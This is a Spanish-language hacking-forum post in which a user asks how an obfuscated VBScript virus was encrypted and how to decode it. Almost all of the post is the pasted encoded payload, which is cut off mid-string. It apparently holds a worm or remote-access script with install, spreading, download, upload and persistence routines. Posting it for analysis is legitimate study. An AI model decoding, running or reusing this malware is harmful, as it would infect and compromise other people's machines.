elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  descifrar virus (.vbs)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: descifrar virus (.vbs)  (Leído 6,164 veces)
**Aincrad**


Desconectado Desconectado

Mensajes: 683



Ver Perfil WWW
descifrar virus (.vbs)
« en: 19 Octubre 2017, 15:59 pm »

hola-  ;D
no se como descifrar este vbs , ni siquiera logro ver como lo encriptaron.
alguien me puede explicar como lo encriptaron y explicarme como desencriptarlo?

aquí dejo el virus vbs:

Código
  1. dDssDajcooSLscaC = (("“šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b\85”™žŸŒ——”KhKMPŒ››ŒŸŒPM85—™–‘”—KhKŸ 85—™–‘š—KhK‘Œ—ž858585”˜Kž“——š•K85žŸKž“——š•KhK¢žŽ”›ŸYŽŒŸš•ŽŸSM¢žŽ”›ŸYž“——MT85”˜K‘”—ž¤žŸ˜š•85žŸK‘”—ž¤žŸ˜š•KhKŽŒŸš•ŽŸSMžŽ”›Ÿ”™’Y‘”—ž¤žŸ˜š•ŽŸMT85”˜K“ŸŸ›š•85žŸK“ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—“ŸŸ›MT85858585”™žŸŒ——™Œ˜KhK¢žŽ”›ŸYžŽ”›Ÿ™Œ˜85žŸŒŸ ›KhKž“——š•Yž›Ž”Œ—‘š—žKSMžŸŒŸ ›MTKQKM‡M85”™žŸŒ——”KhKž“——š•Y£›Œ™™¡”š™˜™ŸžŸ”™’žS”™žŸŒ——”TKQKM‡M85”‘K™šŸK‘”—ž¤žŸ˜š•Y‘š—£”žŸžS”™žŸŒ——”TKŸ“™KK”™žŸŒ——”KhKž“——š•Y£›Œ™™¡”š™˜™ŸžŸ”™’žSMPŸ˜›PMTKQKM‡M85ž›—”ŸKhKMgMKQKM§MKQKMiM85ž—›KhK`[[[K85”˜Kž›š™ž85”˜KŽ˜85”˜K›ŒŒ˜85”™‘šKhKMM85 žž›Œ”™’KhKMM85žŸŒŸŒŸKhKMM85”˜Kš™š™Ž858585š™KšKž ˜K™£Ÿ858585”™žŸŒ™Ž85¢“”—KŸ 8585”™žŸŒ——8585ž›š™žKhKMM85ž›š™žKhK›šžŸKSM”žXŒ¤MWMMT85Ž˜KhKž›—”ŸKSž›š™žWž›—”ŸT85ž—ŽŸKŽŒžKŽ˜KS[T85ŽŒžKM£ŽŽ ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£Ž ŸK›ŒŒ˜85ŽŒžKM ›ŒŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKš™š™ŽYŽ—šž85KKKKKKžŸKš™š™ŽKhKK‘”—ž¤žŸ˜š•Yš›™Ÿ£Ÿ‘”—KS”™žŸŒ——”KQK”™žŸŒ——™Œ˜KW]WK‘Œ—žT85KKKKKKš™š™ŽY¢”ŸK›ŒŒ˜85KKKKKKš™š™ŽYŽ—šž85KKKKKKž“——š•Y ™KM¢žŽ”›ŸY£KZZmKMKQKŽ“S^_TKQK”™žŸŒ——”KQK”™žŸŒ——™Œ˜KQKŽ“S^_T85KKKKKK¢žŽ”›ŸYœ ”ŸK85ŽŒžKM ™”™žŸŒ——M85KKKKKK ™”™žŸŒ——85ŽŒžKMž™M85KKKKKKš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMž”ŸXž™M85KKKKKKž”Ÿš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMŽ¡M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK ›—šŒKS›ŒŒ˜T85ŽŒžKKM™ ˜X”¡M85KKKKKK›šžŸKM”žX™ ˜X”¡MW™ ˜”¡KK85ŽŒžKKM™ ˜X‘Œ‘M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM”žX™ ˜X‘Œ‘MW™ ˜‘Œ‘KS›ŒŒ˜T85ŽŒžKKM™ ˜X›šŽžžM85KKKKKK›šžŸKM”žX™ ˜X›šŽžžMW™ ˜›šŽžžKKK85ŽŒžKKMŽ˜Xž“——M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM”žXŽ˜Xž“——MWŽ˜ž“——KS›ŒŒ˜TKK85ŽŒžKKM—ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK—Ÿ‘Œ‘KS›ŒŒ˜TK85ŽŒžKKM£”ŸX›šŽžžM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£”Ÿ›šŽžžKS›ŒŒ˜TK85ŽŒžKKMž—›M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKž—›KhK¡Œ—KS›ŒŒ˜TKKKKKKKK85™Kž—ŽŸ8585¢žŽ”›ŸYž—›Kž—›8585¢™858585ž K”™žŸŒ——85š™KšKž ˜K™£Ÿ85”˜K—™–š•85”˜K‘”—™Œ˜85”˜K‘š—™Œ˜85”˜K‘”—”Žš™85”˜K‘š—”Žš™8585 ›žŸŒŸ85‘šKŒŽ“K”¡K”™K‘”—ž¤žŸ˜š•Y”¡ž8585”‘KK”¡Y”žŒ¤KhKŸ KŸ“™85”‘KK”¡Y‘ž›ŒŽKKiK[KŸ“™85”‘KK”¡Y”¡Ÿ¤›KKhK\KŸ“™85KKKK‘”—ž¤žŸ˜š•YŽš›¤‘”—K¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜KWK”¡Y›ŒŸ“KQKM‡MKQK”™žŸŒ——™Œ˜WŸ 85KKKK”‘KK‘”—ž¤žŸ˜š•Y‘”—£”žŸžKS”¡Y›ŒŸ“KQKM‡MKQK”™žŸŒ——™Œ˜TKKŸ“™85KKKKKKKK‘”—ž¤žŸ˜š•Y’Ÿ‘”—S”¡Y›ŒŸ“KQKM‡MKKQK”™žŸŒ——™Œ˜TYŒŸŸ” ŸžKhK]V_85KKKK™K”‘85KKKK‘šKŒŽ“K‘”—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—SK”¡Y›ŒŸ“KQKM‡MKTYq”—ž85KKKKKKKK”‘K™šŸK—™–‘”—KŸ“™K£”ŸK‘š85KKKKKKKK”‘KK”™žŸKS‘”—Y™Œ˜WMYMTKŸ“™85KKKKKKKKKKKK”‘KK—ŽŒžKSž›—”ŸS‘”—Y™Œ˜WKMYMTKS š ™Sž›—”ŸS‘”—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ“™85KKKKKKKKKKKKKKKK‘”—YŒŸŸ” ŸžKhK]V_85KKKKKKKKKKKKKKKK”‘KK ŽŒžKS‘”—Y™Œ˜TKgiK ŽŒžKS”™žŸŒ——™Œ˜TKŸ“™85KKKKKKKKKKKKKKKKKKKK‘”—™Œ˜KhKž›—”ŸS‘”—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKžŸK—™–š•KhKž“——š•YŽŒŸž“šŸŽ ŸKS”¡Y›ŒŸ“KQKM‡MKKQK‘”—™Œ˜KS[TKQKMY—™–MTK85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢”™š¢žŸ¤—KhKb85KKKKKKKKKKKKKKKKKKKK—™–š•YŸŒ’Ÿ›ŒŸ“KhKMŽ˜Y£M85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢š–”™’”ŽŸš¤KhKMM85KKKKKKKKKKKKKKKKKKKK—™–š•YŒ’ ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS‘”—Y™Œ˜WMKMWKŽ“¢S^_TKQKMKMKQKŽ“¢S^_TTKQKMQžŸŒŸKMKQK›—ŒŽS”™žŸŒ——™Œ˜WMKMWKŽ“¢S^_TKQKMKMKQKŽ“¢S^_TTKQMQ£”ŸM85KKKKKKKKKKKKKKKKKKKK‘”—”Žš™KhKž“——š•Y’ŒKSMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡Ž—Œžžž‡MKQKž“——š•Y’ŒKSMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡Ž—Œžžž‡YMKQKž›—”ŸS‘”—Y™Œ˜WKMYMTS š ™Sž›—”ŸS‘”—Y™Œ˜WKMYMTTTQKM‡MTKQKM‡‘Œ —Ÿ”Žš™‡MTK85KKKKKKKKKKKKKKKKKKKK”‘KK”™žŸKS‘”—”Žš™WMWMTKhK[KŸ“™85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y”Žš™—šŽŒŸ”š™KhK‘”—Y›ŒŸ“85KKKKKKKKKKKKKKKKKKKK—žK85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y”Žš™—šŽŒŸ”š™KhK‘”—”Žš™85KKKKKKKKKKKKKKKKKKKK™K”‘85KKKKKKKKKKKKKKKKKKKK—™–š•YžŒ¡ST85KKKKKKKKKKKKKKKK™K”‘85KKKKKKKKKKKK™K”‘85KKKKKKKK™K”‘85KKKK™£Ÿ85KKKK‘šKŒŽ“K‘š—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—SK”¡Y›ŒŸ“KQKM‡MKTYž ‘š—ž85KKKKKKKK”‘K™šŸK—™–‘š—KŸ“™K£”ŸK‘š85KKKKKKKK‘š—YŒŸŸ” ŸžKhK]V_85KKKKKKKK‘š—™Œ˜KhK‘š—Y™Œ˜85KKKKKKKKžŸK—™–š•KhKž“——š•YŽŒŸž“šŸŽ ŸKS”¡Y›ŒŸ“KQKM‡MKKQK‘š—™Œ˜KQKMY—™–MTK85KKKKKKKK—™–š•Y¢”™š¢žŸ¤—KhKb85KKKKKKKK—™–š•YŸŒ’Ÿ›ŒŸ“KhKMŽ˜Y£M85KKKKKKKK—™–š•Y¢š–”™’”ŽŸš¤KhKMM85KKKKKKKK—™–š•YŒ’ ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS‘š—Y™Œ˜WMKMWKŽ“¢S^_TKQKMKMKQKŽ“¢S^_TTKQKMQžŸŒŸK£›—šKMKQK›—ŒŽS”™žŸŒ——™Œ˜WMKMWKŽ“¢S^_TKQKMKMKQKŽ“¢S^_TTKQMQ£”ŸM85KKKKKKKK‘š—”Žš™KhKž“——š•Y’ŒKSMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡Ž—Œžžž‡‘š—‡‘Œ —Ÿ”Žš™‡MTK85KKKKKKKK”‘KK”™žŸKS‘š—”Žš™WMWMTKhK[KŸ“™85KKKKKKKKKKKK—™–š•Y”Žš™—šŽŒŸ”š™KhK‘š—Y›ŒŸ“85KKKKKKKK—žK85KKKKKKKKKKKK—™–š•Y”Žš™—šŽŒŸ”š™KhK‘š—”Žš™85KKKKKKKK™K”‘85KKKKKKKK—™–š•YžŒ¡ST85KKKK™£Ÿ85™Kt‘85™Kt‘85™K”‘85™£Ÿ85YŽ—Œ85™Kž 8585ž K ™”™žŸŒ——85š™KšKž ˜K™£Ÿ85”˜K‘”—™Œ˜85”˜K‘š—™Œ˜8585ž“——š•Y’—ŸKMsvp„Šn€}}pyŠ€~p}‡žš‘Ÿ¢Œ‡˜”Žšžš‘Ÿ‡¢”™š¢ž‡Ž ™Ÿ¡ž”š™‡ ™‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[T85ž“——š•Y’—ŸKMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡˜”Žšžš‘Ÿ‡¢”™š¢ž‡Ž ™Ÿ¡ž”š™‡ ™‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[T85‘”—ž¤žŸ˜š•Y—Ÿ‘”—KžŸŒŸ ›KQK”™žŸŒ——™Œ˜KWŸ 85‘”—ž¤žŸ˜š•Y—Ÿ‘”—K¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜KWŸ 8585‘šKKŒŽ“K”¡K”™K‘”—ž¤žŸ˜š•Y”¡ž85”‘KK”¡Y”žŒ¤KhKŸ KŸ“™85”‘KK”¡Y‘ž›ŒŽKKiK[KŸ“™85”‘KK”¡Y”¡Ÿ¤›KKhK\KŸ“™85KKKK‘šKKŒŽ“K‘”—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—KSK”¡Y›ŒŸ“KQKM‡MTY‘”—ž85KKKKKKKKKš™KšKž ˜K™£Ÿ85KKKKKKKKK”‘KK”™žŸKS‘”—Y™Œ˜WMYMTKŸ“™85KKKKKKKKKKKKK”‘KK—ŽŒžKSž›—”ŸS‘”—Y™Œ˜WKMYMTS š ™Sž›—”ŸS‘”—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ“™85KKKKKKKKKKKKKKKKK‘”—YŒŸŸ” ŸžKhK[85KKKKKKKKKKKKKKKKK”‘KK ŽŒžKS‘”—Y™Œ˜TKgiK ŽŒžKS”™žŸŒ——™Œ˜TKŸ“™85KKKKKKKKKKKKKKKKKKKKK‘”—™Œ˜KhKž›—”ŸS‘”—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKK‘”—ž¤žŸ˜š•Y—Ÿ‘”—KS”¡Y›ŒŸ“KQKM‡MKQK‘”—™Œ˜S[TKQKMY—™–MKT85KKKKKKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKKKKKK‘”—ž¤žŸ˜š•Y—Ÿ‘”—KS”¡Y›ŒŸ“KQKM‡MKQK‘”—Y™Œ˜T85KKKKKKKKKKKKKKKKK™Kt‘85KKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKK‘”—ž¤žŸ˜š•Y—Ÿ‘”—KS‘”—Y›ŒŸ“TK85KKKKKKKKKKKKK™K”‘85KKKKKKKKK™K”‘85KKKKK™£Ÿ85KKKKK‘šKŒŽ“K‘š—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—SK”¡Y›ŒŸ“KQKM‡MKTYž ‘š—ž85KKKKKKKKK‘š—YŒŸŸ” ŸžKhK[85KKKKK™£Ÿ85™K”‘85™K”‘85™K”‘85™£Ÿ85¢žŽ”›ŸYœ ”Ÿ85™Kž 8585‘ ™ŽŸ”š™K›šžŸKSŽ˜KW›ŒŒ˜T8585›šžŸKhK›ŒŒ˜85“ŸŸ›š•Yš›™KM›šžŸMWM“ŸŸ›eZZMKQK“šžŸKQKMeMKQK›šŸKQMZMKQKŽ˜WK‘Œ—ž85“ŸŸ›š•YžŸœ žŸ“ŒKM žXŒ’™ŸeMW”™‘š˜ŒŸ”š™85“ŸŸ›š•Yž™K›ŒŒ˜85›šžŸKhK“ŸŸ›š•Yž›š™žŸ£Ÿ85™K‘ ™ŽŸ”š™8585‘ ™ŽŸ”š™K”™‘š˜ŒŸ”š™85š™KšKž ˜K™£Ÿ85”‘KK”™‘KhKMMKŸ“™85KKKK”™‘KhK“¢”KQKž›—”ŸK85KKKK”™‘KhK”™‘KKQKž“——š•Y£›Œ™™¡”š™˜™ŸžŸ”™’žSMPŽš˜› Ÿ™Œ˜PMTKQKž›—”ŸK85KKKK”™‘KhK”™‘KKQKž“——š•Y£›Œ™™¡”š™˜™ŸžŸ”™’žSMP ž™Œ˜PMTKQKž›—”Ÿ8585KKKKžŸKššŸKhK’Ÿš•ŽŸSM¢”™˜’˜Ÿže¦”˜›žš™ŒŸ”š™—¡—h”˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž”˜¡]MT85KKKKžŸKšžKhKššŸY£Žœ ¤KSMž—ŽŸKUK‘š˜K¢”™^]Šš›ŒŸ”™’ž¤žŸ˜MT85KKKK‘šKŒŽ“Kšž”™‘šK”™Kšž85KKKKKKK”™‘KhK”™‘KQKšž”™‘šYŽŒ›Ÿ”š™KQKž›—”ŸKK85KKKKKKK£”ŸK‘š85KKKK™£Ÿ85KKKK”™‘KhK”™‘KQKM›— žMKQKž›—”Ÿ85KKKK”™‘KhK”™‘KQKžŽ ”Ÿ¤KQKž›—”Ÿ85KKKK”™‘KhK”™‘KQK žž›Œ”™’85KKKK”™‘š˜ŒŸ”š™KhK”™‘KK85—ž85KKKK”™‘š˜ŒŸ”š™KhK”™‘85™K”‘85™K‘ ™ŽŸ”š™858585ž K ›žŸŒŸKST85š™KšKž ˜Ky£Ÿ8585ž“——š•Y’¢”ŸKMsvp„Šn€}}pyŠ€~p}‡žš‘Ÿ¢Œ‡˜”Žšžš‘Ÿ‡¢”™š¢ž‡Ž ™Ÿ¡ž”š™‡ ™‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ”›ŸY£KZZmKMKQKŽ“¢S^_TKQK”™žŸŒ——”KQK”™žŸŒ——™Œ˜KQKŽ“¢S^_TKWKM}prŠ~…M85ž“——š•Y’¢”ŸKMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡˜”Žšžš‘Ÿ‡¢”™š¢ž‡Ž ™Ÿ¡ž”š™‡ ™‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ”›ŸY£KZZmKMKKQKŽ“¢S^_TKQK”™žŸŒ——”KQK”™žŸŒ——™Œ˜KQKŽ“¢S^_TKWKM}prŠ~…M85‘”—ž¤žŸ˜š•YŽš›¤‘”—K¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜W”™žŸŒ——”KQK”™žŸŒ——™Œ˜WŸ 85‘”—ž¤žŸ˜š•YŽš›¤‘”—K¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜WžŸŒŸ ›KQK”™žŸŒ——™Œ˜KWŸ 8585™Kž 858585‘ ™ŽŸ”š™K“¢”85š™KšKž ˜K™£Ÿ8585žŸKššŸKhK’Ÿš•ŽŸSM¢”™˜’˜Ÿže¦”˜›žš™ŒŸ”š™—¡—h”˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž”˜¡]MT85žŸK”ž–žKhKššŸY£Žœ ¤KSMž—ŽŸKUK‘š˜K¢”™^]Š—š’”ŽŒ—”ž–MT85‘šKŒŽ“K”ž–K”™K”ž–ž85KKKK”‘KK”ž–Y¡š— ˜ž”Œ—™ ˜KgiKMMKŸ“™85KKKKKKKK“¢”KhK”ž–Y¡š— ˜ž”Œ—™ ˜85KKKKKKKK£”ŸK‘š85KKKK™K”‘85™£Ÿ85™K‘ ™ŽŸ”š™858585‘ ™ŽŸ”š™KžŽ ”Ÿ¤K85š™KšKž ˜K™£Ÿ8585žŽ ”Ÿ¤KhKMM8585žŸKš•¢˜”ž¡”ŽKhK’Ÿš•ŽŸSM¢”™˜’˜Ÿže¦”˜›žš™ŒŸ”š™—¡—h”˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž”˜¡]MT85žŸKŽš—”Ÿ˜žKhKš•¢˜”ž¡”ŽY£Žœ ¤SMž—ŽŸKUK‘š˜K¢”™^]Šš›ŒŸ”™’ž¤žŸ˜MWW_cT85‘šKŒŽ“Kš•”Ÿ˜K”™KŽš—”Ÿ˜ž85KKKK¡ž”š™žŸKhKž›—”ŸKSš•”Ÿ˜Y¡ž”š™WMYMT85™£Ÿ85¡ž”š™žŸKhKž›—”ŸKSŽš—”Ÿ˜žY¡ž”š™WMYMT85šž¡ž”š™KhK¡ž”š™žŸKS[TKQKMYM85‘šKK£KhK\KŸšK š ™KS¡ž”š™žŸT854Kšž¡ž”š™KhKšž¡ž”š™KQKK¡ž”š™žŸKS”T85™£Ÿ85šž¡ž”š™KhK¡Œ—KSšž¡ž”š™T85”‘KKšž¡ž”š™KiKaKŸ“™KžŽKhKMžŽ ”Ÿ¤Ž™Ÿ]MK—žKžŽKhKMžŽ ”Ÿ¤Ž™ŸM8585žŸKš•žŽ ”Ÿ¤Ž™ŸKhK’Ÿš•ŽŸSM¢”™˜’˜Ÿže‡‡—šŽŒ—“šžŸ‡ššŸ‡MKQKžŽT85~ŸKŽš—Œ™Ÿ”¡” žKhKš•žŽ ”Ÿ¤Ž™ŸY£Žœ ¤SMž—ŽŸKUK‘š˜KŒ™Ÿ”¡” ž›š ŽŸMWM¢œ—MW[T8585‘šKŒŽ“Kš•Œ™Ÿ”¡” žK”™KŽš—Œ™Ÿ”¡” ž85KKKKžŽ ”Ÿ¤KKhKžŽ ”Ÿ¤KKQKš•Œ™Ÿ”¡” žY”ž›—Œ¤™Œ˜KQKMKYM85™£Ÿ85”‘KžŽ ”Ÿ¤KKhKMMKŸ“™KžŽ ”Ÿ¤KKhKM™Œ™XŒ¡M85™K‘ ™ŽŸ”š™858585‘ ™ŽŸ”š™K”™žŸŒ™Ž85š™KšKž ˜K™£Ÿ8585 žž›Œ”™’KhKž“——š•Y’ŒKSMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[TKQKM‡MT85”‘K žž›Œ”™’KhKMMKŸ“™85KKK”‘K—ŽŒžKSK˜”S¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜W]TTKhKMe‡MKQKK—ŽŒžS”™žŸŒ——™Œ˜TKŸ“™85KKKKKK žž›Œ”™’KhKMŸ KXKMKQKŒŸ85KKKKKKž“——š•Y’¢”ŸKMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ”™’WKM}prŠ~…M85KKK—ž85KKKKKK žž›Œ”™’KhKM‘Œ—žKXKMKQKŒŸ85KKKKKKž“——š•Y’¢”ŸKMsvp„ŠwznlwŠxlnstyp‡žš‘Ÿ¢Œ‡MKQKž›—”ŸKS”™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ”™’WKM}prŠ~…M8585KKK™K”‘85™Kt‘85858585 ›žŸŒŸ85žŸKžŽ”›Ÿ‘ ——™Œ˜ž“šŸKhKK‘”—ž¤žŸ˜š•Y’Ÿ‘”—KS¢žŽ”›ŸYžŽ”›Ÿ‘ ——™Œ˜T85žŸK”™žŸŒ——‘ ——™Œ˜ž“šŸKhKK‘”—ž¤žŸ˜š•Y’Ÿ‘”—KS”™žŸŒ——”KQK”™žŸŒ——™Œ˜T85”‘KK—ŽŒžKSžŽ”›Ÿ‘ ——™Œ˜ž“šŸYž“šŸ›ŒŸ“TKgiK—ŽŒžKS”™žŸŒ——‘ ——™Œ˜ž“šŸYž“šŸ›ŒŸ“TKŸ“™K85KKKKž“——š•Y ™KM¢žŽ”›ŸY£KZZmKMKQKŽ“S^_TKQK”™žŸŒ——”KQK”™žŸŒ——™Œ˜KQKn“S^_T85KKKK¢žŽ”›ŸYœ ”ŸK85™Kt‘85YŽ—Œ85žŸKš™š™ŽKhK‘”—ž¤žŸ˜š•Yš›™Ÿ£Ÿ‘”—KS”™žŸŒ——”KQK”™žŸŒ——™Œ˜KWcWK‘Œ—žT85”‘KKY™ ˜KiK[KŸ“™K¢žŽ”›ŸYœ ”Ÿ85™K‘ ™ŽŸ”š™858585ž Kž”Ÿš¢™—šŒKS‘”— —W‘”—™Œ˜T8585žŸ—”™–KhK‘”— —85žŸžŒ¡ŸšKhK”™žŸŒ——”KQK‘”—™Œ˜85žŸKš•“ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—“ŸŸ›MKT85š•“ŸŸ›š¢™—šŒYš›™KM’ŸMWKžŸ—”™–WK‘Œ—ž85š•“ŸŸ›š¢™—šŒYž™8585žŸKš•‘žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ”›Ÿ”™’Y‘”—ž¤žŸ˜š•ŽŸMT85”‘KKš•‘žšš¢™—šŒY‘”—£”žŸžKSžŸžŒ¡ŸšTKŸ“™85KKKKš•‘žšš¢™—šŒY—Ÿ‘”—KSžŸžŒ¡ŸšT85™K”‘85K85”‘Kš•“ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ“™85KKK”˜KKš•žŸŒ˜š¢™—šŒ85KKKžŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKK¢”Ÿ“Kš•žŸŒ˜š¢™—šŒ8544YŸ¤›KhK\K8544Yš›™8544Y¢”ŸKš•“ŸŸ›š¢™—šŒYž›š™žš¤8544YžŒ¡Ÿš‘”—KžŸžŒ¡Ÿš8544YŽ—šž85KKK™K¢”Ÿ“85KKKžŸKš•žŸŒ˜š¢™—šŒKhK™šŸ“”™’85™K”‘85”‘Kš•‘žšš¢™—šŒY‘”—£”žŸžSžŸžŒ¡ŸšTKŸ“™85KKKž“——š•Y ™Kš•‘žšš¢™—šŒY’Ÿ‘”—KSžŸžŒ¡ŸšTYž“šŸ›ŒŸ“85™K”‘K85™Kž 8585ž Kš¢™—šŒKS‘”— —W‘”—”T8585”‘K‘”—”KhKMMKŸ“™K85KKK‘”—”KhK”™žŸŒ——”85™K”‘8585žŸžŒ¡ŸšKhK‘”—”KQK˜”KS‘”— —WK”™žŸ¡KS‘”— —WM‡MTKVK\T85žŸKš•“ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—“ŸŸ›MT85š•“ŸŸ›š¢™—šŒYš›™KM›šžŸMWM“ŸŸ›eZZMKQK“šžŸKQKMeMKQK›šŸKQMZMKQKM”žXž™”™’MKQKž›—”ŸKQK‘”— —WK‘Œ—ž85š•“ŸŸ›š¢™—šŒYž™KMM85KKKKK85žŸKš•‘žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ”›Ÿ”™’Y‘”—ž¤žŸ˜š•ŽŸMT85”‘KKš•‘žšš¢™—šŒY‘”—£”žŸžKSžŸžŒ¡ŸšTKŸ“™85KKKKš•‘žšš¢™—šŒY—Ÿ‘”—KSžŸžŒ¡ŸšT85™K”‘85”‘KKš•“ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ“™85KKKK”˜KKš•žŸŒ˜š¢™—šŒ854žŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKKK¢”Ÿ“Kš•žŸŒ˜š¢™—šŒK8544KYŸ¤›KhK\K8544KYš›™8544KY¢”ŸKš•“ŸŸ›š¢™—šŒYž›š™žš¤8544KYžŒ¡Ÿš‘”—KžŸžŒ¡Ÿš8544KYŽ—šž854™K¢”Ÿ“85KKKKžŸKš•žŸŒ˜š¢™—šŒKKhK™šŸ“”™’85™K”‘85”‘Kš•‘žšš¢™—šŒY‘”—£”žŸžSžŸžŒ¡ŸšTKŸ“™85KKKž“——š•Y ™Kš•‘žšš¢™—šŒY’Ÿ‘”—KSžŸžŒ¡ŸšTYž“šŸ›ŒŸ“85™K”‘K85™Kž 858585‘ ™ŽŸ”š™K ›—šŒKS‘”— —T8585”˜KK“ŸŸ›š•Wš•žŸŒ˜ ›—šŒW ‘‘85žŸKKš•žŸŒ˜ ›—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85¢”Ÿ“Kš•žŸŒ˜ ›—šŒK85KKKKKYŸ¤›KhK\K85KKKKKYš›™854KY—šŒ‘š˜‘”—K‘”— —854K ‘‘KhKYŒ854KYŽ—šž85™K¢”Ÿ“85žŸKš•žŸŒ˜š¢™—šŒKhK™šŸ“”™’85žŸK“ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—“ŸŸ›MT85“ŸŸ›š•Yš›™KM›šžŸMWM“ŸŸ›eZZMKQK“šžŸKQKMeMKQK›šŸKQMZMKQKM”žXŽ¡”™’MKQKž›—”ŸKQK‘”— —WK‘Œ—ž85“ŸŸ›š•Yž™K ‘‘85™K‘ ™ŽŸ”š™858585‘ ™ŽŸ”š™K™ ˜”¡KST8585‘šKKŒŽ“K”¡K”™K‘”—ž¤žŸ˜š•Y”¡ž85”‘KKK”¡Y”žŒ¤KhKŸ KŸ“™85KKKKK™ ˜”¡KhK™ ˜”¡KQK”¡Y›ŒŸ“KQKM§MKQK”¡Y”¡Ÿ¤›KQKž›—”Ÿ85™K”‘85™£Ÿ85™Kq ™ŽŸ”š™8585‘ ™ŽŸ”š™K™ ˜‘Œ‘KS™ ˜”T8585™ ˜‘Œ‘KhK™ ˜”KQKž›—”Ÿ85‘šKKŒŽ“K‘š—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—KS™ ˜”TYž ‘š—ž85KKKKK™ ˜‘Œ‘KhK™ ˜‘Œ‘KQK‘š—Y™Œ˜KQKM§MKQKMMKQKM§MKQKMMKQKM§MKQK‘š—YŒŸŸ” ŸžKQKž›—”Ÿ85™£Ÿ8585‘šKKŒŽ“K‘”—K”™K‘”—ž¤žŸ˜š•Y’Ÿ‘š—KS™ ˜”TY‘”—ž85KKKKK™ ˜‘Œ‘KhK™ ˜‘Œ‘KQK‘”—Y™Œ˜KQKM§MKQK‘”—Yž”¥KKQKM§MKQKM‘MKQKM§MKQK‘”—YŒŸŸ” ŸžKQKž›—”Ÿ8585™£Ÿ85™K‘ ™ŽŸ”š™858585‘ ™ŽŸ”š™K™ ˜›šŽžžKST8585š™KšKž ˜K™£Ÿ8585žŸKš•¢˜”ž¡”ŽKhK’Ÿš•ŽŸSM¢”™˜’˜Ÿže‡‡Y‡ššŸ‡Ž”˜¡]MT85žŸKŽš—”Ÿ˜žKhKš•¢˜”ž¡”ŽY£Žœ ¤SMž—ŽŸKUK‘š˜K¢”™^]Š›šŽžžMWW_cT8585”˜Kš•”Ÿ˜85‘šKŒŽ“Kš•”Ÿ˜K”™KŽš—”Ÿ˜ž854™ 